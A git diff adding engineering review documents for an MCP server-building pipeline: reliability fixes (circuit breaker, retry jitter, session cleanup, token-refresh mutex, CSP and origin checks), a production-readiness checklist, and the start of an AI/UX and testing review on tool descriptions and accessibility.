+ +```typescript +class CircuitBreaker { + private state: CircuitState = "closed"; + private failureCount = 0; + private lastFailureTime = 0; + private halfOpenLock = false; // ADD THIS + private readonly failureThreshold: number; + private readonly resetTimeoutMs: number; + + constructor(failureThreshold = 5, resetTimeoutMs = 60_000) { + this.failureThreshold = failureThreshold; + this.resetTimeoutMs = resetTimeoutMs; + } + + canExecute(): boolean { + if (this.state === "closed") return true; + if (this.state === "open") { + if (Date.now() - this.lastFailureTime >= this.resetTimeoutMs) { + // Only allow ONE request through in half-open + if (!this.halfOpenLock) { + this.halfOpenLock = true; + this.state = "half-open"; + logger.info("circuit_breaker.half_open"); + return true; + } + return false; // Another request already testing + } + return false; + } + // half-open: already locked, reject additional requests + return false; + } + + recordSuccess(): void { + this.halfOpenLock = false; + if (this.state !== "closed") { + logger.info("circuit_breaker.closed", { previousFailures: this.failureCount }); + } + this.failureCount = 0; + this.state = "closed"; + } + + recordFailure(): void { + this.halfOpenLock = false; + this.failureCount++; + this.lastFailureTime = Date.now(); + if (this.failureCount >= this.failureThreshold || this.state === "half-open") { + this.state = "open"; + logger.warn("circuit_breaker.open", { + failureCount: this.failureCount, + resetAfterMs: this.resetTimeoutMs, + }); + } + } +} +``` + +### CRITICAL: Add Jitter to Retry Delays + +**Problem:** Exponential backoff without jitter causes thundering herd. 
+**Fix:** + +```typescript +// BEFORE (bad): +await this.delay(RETRY_BASE_DELAY * Math.pow(2, attempt)); + +// AFTER (correct): +const baseDelay = RETRY_BASE_DELAY * Math.pow(2, attempt); +const jitter = Math.random() * baseDelay * 0.5; // 0-50% jitter +await this.delay(baseDelay + jitter); +``` + +### CRITICAL: Fix HTTP Session Memory Leak + +**Problem:** Sessions Map grows without bound. +**Fix:** Add TTL-based cleanup and max session limit. + +```typescript +// In startHttpTransport(): +const sessions = new Map<string, { transport: StreamableHTTPServerTransport; lastActivity: number }>(); +const MAX_SESSIONS = 100; +const SESSION_TTL_MS = 30 * 60 * 1000; // 30 minutes + +// Session cleanup interval +const cleanupInterval = setInterval(() => { + const now = Date.now(); + for (const [id, session] of sessions.entries()) { + if (now - session.lastActivity > SESSION_TTL_MS) { + logger.info("session.expired", { sessionId: id }); + sessions.delete(id); + } + } +}, 60_000); // Check every minute + +// Limit max sessions +function getOrCreateSession(sessionId?: string): StreamableHTTPServerTransport { + if (sessionId && sessions.has(sessionId)) { + const session = sessions.get(sessionId)!; + session.lastActivity = Date.now(); + return session.transport; + } + if (sessions.size >= MAX_SESSIONS) { + // Evict oldest session + let oldest: string | null = null; + let oldestTime = Infinity; + for (const [id, s] of sessions.entries()) { + if (s.lastActivity < oldestTime) { + oldestTime = s.lastActivity; + oldest = id; + } + } + if (oldest) sessions.delete(oldest); + } + // Create new session... +} + +// Clean up on server shutdown +process.on('SIGTERM', () => { + clearInterval(cleanupInterval); + sessions.clear(); +}); +``` + +### CRITICAL: Add OAuth Token Refresh Mutex + +**Problem:** Concurrent requests all try to refresh expired token simultaneously. 
+**Fix:** + +```typescript +export class APIClient { + private accessToken: string | null = null; + private tokenExpiry: number = 0; + private refreshPromise: Promise<string> | null = null; // ADD THIS + + private async getAccessToken(): Promise<string> { + // Return cached token if valid (5 min buffer) + if (this.accessToken && Date.now() < this.tokenExpiry - 300_000) { + return this.accessToken; + } + + // If already refreshing, wait for that to complete + if (this.refreshPromise) { + return this.refreshPromise; + } + + // Start a new refresh and let all concurrent callers share it + this.refreshPromise = this._doRefresh(); + try { + const token = await this.refreshPromise; + return token; + } finally { + this.refreshPromise = null; + } + } + + private async _doRefresh(): Promise<string> { + // ... actual token refresh logic ... + } +} +``` + +### HIGH: Add postMessage Origin Validation to App Template + +```javascript +// In the message event listener: +window.addEventListener('message', (event) => { + // Validate origin — only accept from our host + const allowedOrigins = [ + window.location.origin, + 'http://localhost:3000', + 'http://192.168.0.25:3000', + // Add production origin + ]; + + // In production, be strict. In development, accept any. + const isDev = window.location.hostname === 'localhost' || window.location.hostname === '127.0.0.1'; + if (!isDev && !allowedOrigins.includes(event.origin)) { + console.warn('[App] Rejected postMessage from untrusted origin:', event.origin); + return; + } + + try { + const msg = event.data; + // ... existing handler logic ... 
+ } catch (e) { + console.error('postMessage handler error:', e); + } +}); +``` + +### HIGH: Add CSP Meta Tag to App Template + +```html +<!DOCTYPE html> +<html lang="en"> +<head> + <meta charset="UTF-8"> + <meta http-equiv="Content-Security-Policy" content="default-src 'none'; script-src 'unsafe-inline'; style-src 'unsafe-inline'; img-src data: https:; connect-src 'self'; form-action 'none'; base-uri 'none'"> + <title>{App Name}</title> +``` + +### HIGH: Replace DOM-Based escapeHtml with String-Based + +```javascript +// BEFORE (creates DOM elements — slow at scale): +function escapeHtml(text) { + if (!text) return ''; + const div = document.createElement('div'); + div.textContent = String(text); + return div.innerHTML; +} + +// AFTER (string replacement — 10x faster, SSR-safe): +function escapeHtml(text) { + if (!text) return ''; + return String(text) + .replace(/&/g, '&amp;') + .replace(/</g, '&lt;') + .replace(/>/g, '&gt;') + .replace(/"/g, '&quot;') + .replace(/'/g, '&#39;'); +} +``` + +### HIGH: Add Centralized Health Dashboard Tool + +Add to MCP-FACTORY.md — a meta-server that aggregates health: + +```typescript +// health-aggregator.ts — runs as a separate process +// Calls health_check on every registered MCP server +// Exposes a dashboard endpoint + +interface ServerHealth { + name: string; + status: 'healthy' | 'degraded' | 'unhealthy' | 'unreachable'; + lastChecked: string; + latencyMs: number; + error?: string; +} + +async function checkAllServers(): Promise<ServerHealth[]> { + const servers = loadServerRegistry(); // Read from config + return Promise.all(servers.map(async (server) => { + try { + const result = await callMCPTool(server.command, 'health_check', {}); + return { name: server.name, ...JSON.parse(result), lastChecked: new Date().toISOString() }; + } catch (e) { + return { name: server.name, status: 'unreachable', lastChecked: new Date().toISOString(), latencyMs: -1, error: String(e) }; + } + })); +} +``` + +### MEDIUM: Add Dockerfile 
Template to Server Builder + +```dockerfile +# {service}-mcp/Dockerfile +FROM node:22-alpine AS builder +WORKDIR /app +COPY package*.json ./ +RUN npm ci --production=false +COPY . . 
+RUN npm run build + +FROM node:22-alpine +WORKDIR /app +COPY --from=builder /app/dist ./dist +COPY --from=builder /app/node_modules ./node_modules +COPY --from=builder /app/package.json ./ + +# Non-root user +RUN addgroup -g 1001 mcp && adduser -u 1001 -G mcp -s /bin/sh -D mcp +USER mcp + +# Health check +HEALTHCHECK --interval=30s --timeout=10s --start-period=5s \ + CMD node -e "fetch('http://localhost:3000/health').then(r => process.exit(r.ok ? 0 : 1)).catch(() => process.exit(1))" + +# Default to HTTP transport in containers +ENV MCP_TRANSPORT=http +ENV MCP_HTTP_PORT=3000 +EXPOSE 3000 + +CMD ["node", "dist/index.js"] +``` + +### MEDIUM: Add Interactive Data Grid Search Double-Sort Fix + +```javascript +// BEFORE (buggy — double toggles sort direction): +function handleSearch(query) { + gridState.searchQuery = query.toLowerCase().trim(); + // ... filtering logic ... + if (gridState.sortCol) { + handleSort(gridState.sortCol); + gridState.sortDir = gridState.sortDir === 'asc' ? 'desc' : 'asc'; + handleSort(gridState.sortCol); + } else { + renderRows(); + } +} + +// AFTER (correct — apply sort without toggling): +function handleSearch(query) { + gridState.searchQuery = query.toLowerCase().trim(); + if (!gridState.searchQuery) { + gridState.filteredItems = [...gridState.items]; + } else { + gridState.filteredItems = gridState.items.filter(item => + Object.values(item).some(v => + v != null && String(v).toLowerCase().includes(gridState.searchQuery) + ) + ); + } + // Re-apply current sort WITHOUT toggling direction + if (gridState.sortCol) { + applySortToFiltered(); // New function that sorts without toggling + } + renderRows(); +} + +function applySortToFiltered() { + const colKey = gridState.sortCol; + if (!colKey) return; + gridState.filteredItems.sort((a, b) => { + let aVal = a[colKey], bVal = b[colKey]; + if (aVal == null) return 1; + if (bVal == null) return -1; + if (typeof aVal === 'number' && typeof bVal === 'number') { + return gridState.sortDir === 'asc' ? 
aVal - bVal : bVal - aVal; + } + aVal = String(aVal).toLowerCase(); + bVal = String(bVal).toLowerCase(); + const cmp = aVal.localeCompare(bVal); + return gridState.sortDir === 'asc' ? cmp : -cmp; + }); +} +``` + +### MEDIUM: Add LLM-in-the-Loop Tool Routing Test Harness + +Add to QA tester skill: + +```typescript +// tests/llm-routing.test.ts +// This test REQUIRES an LLM endpoint (Claude API or local proxy) + +const LLM_ENDPOINT = process.env.LLM_TEST_ENDPOINT || 'http://localhost:3001/v1/chat/completions'; + +interface RoutingTestCase { + message: string; + expectedTool: string; + systemPrompt: string; // from channel config +} + +async function testToolRouting(testCase: RoutingTestCase): Promise<{ + correct: boolean; + selectedTool: string | null; + latencyMs: number; +}> { + const start = performance.now(); + + const response = await fetch(LLM_ENDPOINT, { + method: 'POST', + headers: { 'Content-Type': 'application/json' }, + body: JSON.stringify({ + model: 'claude-sonnet-4-20250514', + messages: [ + { role: 'system', content: testCase.systemPrompt }, + { role: 'user', content: testCase.message }, + ], + tools: loadToolDefinitions(), // From compiled server + tool_choice: 'auto', + }), + }); + + const data = await response.json(); + const latencyMs = Math.round(performance.now() - start); + const toolCall = data.choices?.[0]?.message?.tool_calls?.[0]; + const selectedTool = toolCall?.function?.name || null; + + return { + correct: selectedTool === testCase.expectedTool, + selectedTool, + latencyMs, + }; +} +``` + +### LOW: Add Monorepo Structure for Multi-Server Management + +For managing 30+ servers, recommend a workspace structure: + +``` +mcp-servers/ +├── package.json # Workspace root +├── turbo.json # Turborepo config for parallel builds +├── shared/ +│ ├── client/ # Shared API client base class +│ ├── logger/ # Shared logger +│ └── types/ # Shared TypeScript types +├── servers/ +│ ├── calendly-mcp/ +│ ├── mailchimp-mcp/ +│ ├── zendesk-mcp/ +│ └── ... 
(30+ servers) +└── scripts/ + ├── build-all.sh + ├── health-check-all.sh + └── update-deps.sh +``` + +--- + +## Operational Readiness Checklist (Must Exist Before Deploying to Production) + +### Infrastructure (P0 — blocking) + +- [ ] **Containerization:** Every server has a Dockerfile and can be built/deployed as a container +- [ ] **Process management:** PM2, systemd, or Kubernetes manifests for all servers (not manual `node dist/index.js`) +- [ ] **Health monitoring:** Centralized health dashboard that polls all servers every 60s +- [ ] **Alerting:** Circuit breaker trips → Slack/PagerDuty alert within 5 minutes +- [ ] **Log aggregation:** All server stderr → centralized logging (Loki, Datadog, or similar) +- [ ] **Secrets management:** API keys NOT in plaintext .env files — use encrypted store or secrets manager +- [ ] **Resource limits:** Memory + CPU limits per server process (containers or cgroups) + +### Code Quality (P0 — blocking) + +- [ ] **Circuit breaker race condition fixed** (half-open mutex) +- [ ] **Retry jitter added** (prevent thundering herd) +- [ ] **HTTP session TTL + max limit** (prevent memory leak) +- [ ] **OAuth token refresh mutex** (prevent concurrent refresh) +- [ ] **postMessage origin validation** in all app templates +- [ ] **CSP meta tag** in all app templates +- [ ] **String-based escapeHtml** (not DOM-based) + +### Testing (P0 — blocking) + +- [ ] **MCP Inspector passes** for every server +- [ ] **TypeScript compiles clean** for every server +- [ ] **axe-core score >90%** for every app +- [ ] **XSS test passes** for every app +- [ ] **At least 20 tool routing fixtures** per server + +### Testing (P1 — should have) + +- [ ] **LLM-in-the-loop routing tests** for critical channels +- [ ] **Playwright visual regression baselines** captured +- [ ] **Load test:** 10 concurrent users per HTTP server without degradation +- [ ] **Chaos test:** API-down scenario completes gracefully +- [ ] **Smoke test script** for post-deployment 
validation + +### Operations (P1 — should have) + +- [ ] **Runbook:** "API is down" — steps for each integrated API +- [ ] **Runbook:** "Server OOM" — diagnosis and restart procedure +- [ ] **Runbook:** "Wrong data rendered" — debugging data flow +- [ ] **Dependency update cadence:** Monthly `npm audit` + quarterly SDK updates +- [ ] **API version monitoring:** Quarterly check for deprecation notices +- [ ] **Backup:** LocalBosses localStorage thread data export capability + +### Security (P0 for production, P1 for internal) + +- [ ] **No API keys in client-side code** (HTML apps, browser-accessible JS) +- [ ] **Tool descriptions reviewed for injection** — no hidden instructions +- [ ] **Audit logging** for destructive operations (delete, update) +- [ ] **Rate limiting** on tool calls (max N calls per minute per user) +- [ ] **Input sanitization** on tool parameters that touch external systems + +--- + +## Final Assessment + +### What's Excellent +The MCP Factory pipeline is architecturally sound. The 6-phase approach with quality gates, the comprehensive testing framework, and the attention to MCP spec compliance (2025-11-25) are all above-average for the industry. The API analyzer skill is particularly strong — the pagination catalog, tool description formula, and token budget awareness show deep expertise. + +### What Would Break Under Load +1. HTTP session memory leak (will OOM in days under moderate traffic) +2. Circuit breaker allowing all requests through in half-open (can DDoS a recovering API) +3. No retry jitter (thundering herd when API recovers) +4. No process management (30 servers = 30 unmonitored Node processes) + +### What's Missing for Enterprise +1. MCP Gateway/proxy layer (Microsoft, IBM, Envoy all provide this — needed for centralized auth, routing, observability) +2. Container orchestration (Docker + K8s manifests) +3. Centralized secrets management +4. Audit trail for tool invocations +5. Rate limiting at the MCP layer (not just API layer) +6. 
LLM-in-the-loop testing (the most important test, yet the hardest) + +### Recommendation +Fix the 4 critical code issues (circuit breaker, jitter, session leak, token mutex). Add Dockerfiles. Set up PM2 or equivalent. Then you can ship to production for internal use. For bank-grade production, add the MCP Gateway layer and secrets management. + +--- + +*Signed: Director Mei — "If the circuit breaker has a race condition, don't deploy it. Period."* diff --git a/mcp-factory-reviews/gamma-aiux-review.md b/mcp-factory-reviews/gamma-aiux-review.md new file mode 100644 index 0000000..245bd29 --- /dev/null +++ b/mcp-factory-reviews/gamma-aiux-review.md @@ -0,0 +1,792 @@ +# Agent Gamma — AI/UX & Testing Review + +**Reviewer:** Agent Gamma (AI/UX & Testing Methodology Expert) +**Date:** February 4, 2026 +**Scope:** All 5 MCP Factory skills + master blueprint +**Research basis:** Paragon tool-calling benchmarks, Statsig agent architecture patterns, MCP Apps official spec (Jan 2026), Prompt Engineering Guide (function calling), Confident AI agent evaluation framework, WCAG 2.1 accessibility standards, Berkeley Function Calling Leaderboard findings, visual regression tooling landscape + +--- + +## Executive Summary + +- **Tool descriptions are the pipeline's hidden bottleneck.** The current "What/Returns/When" formula is good but insufficient — research shows tool descriptions need *negative examples* ("do NOT use when..."), *disambiguation cues* between similar tools, and *output shape previews* to reach >95% routing accuracy. With 30+ servers averaging 20+ tools each, misrouting will be the #1 user-facing failure mode. + +- **The official MCP Apps extension (shipped Jan 2026) makes our iframe/postMessage architecture semi-obsolete.** MCP now has `ui://` resource URIs, `_meta.ui.resourceUri` on tools, and bidirectional JSON-RPC over postMessage. Our skill documents don't mention this at all — we're building to a 2025 pattern while the spec has moved forward. 
+ +- **Testing is the weakest link in the pipeline.** The QA skill has the right layers but lacks quantitative metrics (tool correctness rate, task completion rate), has no automated regression baseline, no accessibility auditing, and no test data fixtures. It's a manual checklist masquerading as a testing framework. + +- **Accessibility is completely absent.** Zero mention of ARIA attributes, keyboard navigation, focus management, screen reader support, or WCAG contrast ratios across all 5 skills. Our dark theme palette fails WCAG AA for secondary text (#96989d on #1a1d23 = 3.7:1, needs 4.5:1). + +- **App UX patterns are solid for static rendering but miss all interactive patterns.** No drag-and-drop (kanban reordering), no inline editing, no real-time streaming updates, no optimistic UI, no undo/redo, no keyboard shortcuts, no search-within-app. Apps feel like screenshots, not tools. + +--- + +## Per-Skill Reviews + +### 1. MCP API Analyzer (Phase 1) + +**Strengths:** +- Excellent reading priority hierarchy (auth → rate limits → overview → endpoints) +- The "speed technique for large APIs" using OpenAPI specs is smart +- App candidate selection criteria are well-reasoned (BUILD when / SKIP when) +- Template is thorough and would produce consistent outputs + +**Issues & Suggestions:** + +**🔴 Critical: Tool description formula needs upgrading** + +The current formula is: +``` +{What it does}. {What it returns}. {When to use it / what triggers it}. +``` + +Research from Paragon's 50-test-case benchmark (2025) and the Prompt Engineering Guide shows this needs expansion. Better formula: + +``` +{What it does}. {What it returns — include 2-3 key field names}. +{When to use it — specific user intents}. {When NOT to use it — disambiguation}. +{Side effects — if any}. +``` + +**Example upgrade:** +``` +# Current (from skill) +"List contacts with optional filters. Returns paginated results including name, email, phone, +and status. 
Use when the user wants to see, search, or browse their contact list." + +# Improved +"List contacts with optional filters and pagination. Returns {name, email, phone, status, +created_date} for each contact. Use when the user wants to browse, filter, or get an overview +of multiple contacts. Do NOT use for searching by specific keyword (use search_contacts instead) +or for getting full details of one contact (use get_contact instead)." +``` + +The "do NOT use" disambiguation is the single highest-impact improvement per Paragon's research — it reduced tool misrouting by ~30% in their benchmarks. + +**🟡 Important: Missing tool count optimization guidance** + +The skill says "aim for 5-15 groups, 3-15 tools per group" but doesn't address total tool count impact. Research from the Berkeley Function Calling Leaderboard and the Medium analysis of tool limits shows: +- **1-10 tools:** High accuracy, minimal degradation +- **10-20 tools:** Noticeable accuracy drops begin +- **20+ tools:** Significant degradation; lazy loading helps but descriptions still crowd the context + +**Recommendation:** Add guidance to cap *active* tools at 15-20 per interaction via lazy loading, and add a "tool pruning" section for aggressively combining similar tools (e.g., `list_contacts` + `search_contacts` → single tool with optional `query` param). + +**🟡 Important: No semantic clustering guidance** + +When tools have overlapping names (e.g., `list_invoices`, `get_invoice_summary`, `get_invoice_details`), LLMs struggle. Add guidance for: +- Using verb prefixes that signal intent: `browse_` (list/overview), `inspect_` (single item deep-dive), `modify_` (create/update), `remove_` (delete) +- Grouping mutually exclusive tools with "INSTEAD OF" notes in descriptions + +**🟢 Nice-to-have: Add example disambiguation table** + +For each tool group, produce a disambiguation matrix: + +| User says... 
| Correct tool | Why not others | +|---|---|---| +| "Show me all contacts" | list_contacts | Not search (no keyword), not get (not specific) | +| "Find John Smith" | search_contacts | Not list (specific name = search), not get (no ID) | +| "What's John's email?" | get_contact | Not list/search (asking about specific known contact) | + +--- + +### 2. MCP Server Builder (Phase 2) + +**Strengths:** +- Solid project scaffolding with good defaults +- Auth pattern catalog covers the common cases well +- MCP Annotations decision matrix is clear and correct +- Error handling pattern (Zod → client → server levels) is well-layered +- One-file vs modular threshold (15 tools) is practical + +**Issues & Suggestions:** + +**🔴 Critical: Missing MCP Apps extension support** + +As of January 2026, MCP has an official Apps extension (`@modelcontextprotocol/ext-apps`). This changes how tools declare UI: + +```typescript +// NEW PATTERN: Tool declares its UI resource +registerAppTool(server, "get-time", { + title: "Get Time", + description: "Returns the current server time.", + inputSchema: {}, + _meta: { ui: { resourceUri: "ui://get-time/mcp-app.html" } }, +}, async () => { /* handler */ }); + +// Resource serves the HTML +registerAppResource(server, resourceUri, resourceUri, + { mimeType: RESOURCE_MIME_TYPE }, + async () => { /* return HTML */ } +); +``` + +Our servers should be built to support BOTH our custom LocalBosses postMessage pattern AND the official MCP Apps protocol. This future-proofs the servers for use in Claude Desktop, VS Code Copilot, and other MCP hosts. + +**Action:** Add a section on `_meta.ui.resourceUri` registration. Update the tool definition interface to include optional `_meta` field. + +**🟡 Important: Tool description in code doesn't match analysis guidance** + +The builder skill's tool group template has descriptions that are shorter and less detailed than what the analyzer skill recommends. 
The code template shows: + +```typescript +description: "List contacts with optional filters and pagination. Returns name, email, phone, and status. Use when the user wants to see, search, or browse contacts." +``` + +But the Zod schema descriptions are separate and minimal: +```typescript +page: z.number().optional().default(1).describe("Page number (default 1)") +``` + +**Issue:** Parameter descriptions in Zod `.describe()` aren't always surfaced by MCP clients — a client only sees the JSON Schema the server publishes as `inputSchema`, so a Zod description that is not carried into that schema never reaches the LLM. The parameter descriptions in `inputSchema.properties[].description` are what matter for tool selection. Add explicit guidance: "Always put the most helpful description in `inputSchema.properties`, not just in Zod." + +**🟡 Important: No output schema guidance** + +Tool definitions include `inputSchema` but nothing about expected output shapes. While MCP doesn't formally require output schemas, providing an output hint in the tool description massively helps: +1. The LLM knows what data it will get back +2. The LLM can better plan multi-step tool chains +3. App designers know exactly what fields to expect + +Add to the tool definition template: +```typescript +// In the description: +"Returns: { data: Contact[], meta: { total, page, pageSize } } where Contact has {name, email, phone, status}" +``` + +**🟢 Nice-to-have: Add streaming support pattern** + +For tools that return large datasets, add a streaming pattern using MCP's progress notifications. This is especially relevant for list/search operations that may take 2-5 seconds. + +--- + +### 3. 
MCP App Designer (Phase 3) + +**Strengths:** +- Comprehensive design system with specific hex values and spacing +- The 8 app type templates cover the most common patterns +- Three-state requirement (loading/empty/data) is excellent +- Data reception with both postMessage + polling is robust +- Responsive breakpoints and CSS are production-ready + +**Issues & Suggestions:** + +**🔴 Critical: No accessibility at all** + +The entire skill has zero mention of: +- **ARIA attributes** — Tables need `role="table"`, status badges need `role="status"` or `aria-label` +- **Keyboard navigation** — Interactive elements must be focusable and operable with Enter/Space +- **Focus management** — When data loads and replaces skeleton, focus should move to content +- **Color contrast** — Secondary text (#96989d on #1a1d23) = **3.7:1 ratio**. WCAG AA requires 4.5:1 for normal text. Fix: use `#b0b2b8` for secondary text (5.0:1) +- **Screen reader announcements** — Data state changes should use `aria-live="polite"` regions +- **Reduced motion** — The shimmer animation should respect `prefers-reduced-motion` + +**Minimum additions to base template:** +```html + +
+ Loading... + +
+ + +